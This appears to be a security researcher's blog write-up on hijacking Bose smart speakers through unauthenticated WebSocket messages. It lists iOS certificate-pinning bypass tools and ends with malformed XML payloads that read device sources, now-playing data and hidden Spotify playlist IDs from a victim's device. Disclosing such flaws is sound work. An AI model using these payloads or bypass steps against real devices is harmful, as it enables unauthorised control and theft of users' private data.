The WebSocket Protocol enables two-way communication between a client running untrusted code in a controlled environment to a remote host that has opted-in tocommunications from that code. The security model used for this is the origin-based security model commonly used by web browsers.
## Websocket 101 Starts with an HTTP handshake
- Data frames don’t have HTTP overhead
- Data frames don’t have HTTP security
- No headers, cookies, authentication
Here’s something interesting from RFC:
In order to undesrtand the communication between the speaker and the app. We need to remove the TLS cert pinning which is embedded in the app itself. One of the easiest way worth trying on a jailbroken iOS device is to use: https://github.com/nabla-c0d3/ssl-kill-switch2
This approach didn’t work me. There are number of ways to decrypt ios app traffic.
- First is basic Burp Suite setup .
- Second way to do it is to setup a burp suite with proxy in ios app
- Third way might be to use MITM proxy
- Fourth way is to use burp mobile assist
- Fifth way is to use Burp with VPN
- Last way that actually works is to use IPA crack -> Clutch 2.0
One of the most suggested easy way is to use Needle: https://github.com/mwrlabs/needle. With Needle you can easily load modules into the running process aka ios app. In my case I am using a modified version of Cert pinning bypass module and injected it within process to intercept all requests and undestand the flow of information.
Here’s a quick demo of remotely controlling a BOSE device from any internet website a victi might be browsing.
Here’s some of the payloads to retreive information and lookout for open devices over the internet.
Get all sources:
<msg<header deviceID=”EC24B8A7C786” url=”sources” method=”GET”<request requestID=”6”<info type=”new”/</request</header</msg
Get now playing:
<msg<header deviceID=”EC24B8A7C786” url=”now_playing” method=”GET”<request requestID=”11”<info type=”new”/</request</header</msg
Steal UUID of hidden Spotify playlists:
<msg<header deviceID=”EC24B8A7C786” url=”navigate” method=”POST”<request requestID=”165”<info mainNode=”navigateMenu” type=”update”/<sourceItem source=”RECENTS”/</request</header<body<navigate menu=”recents”/</body</msg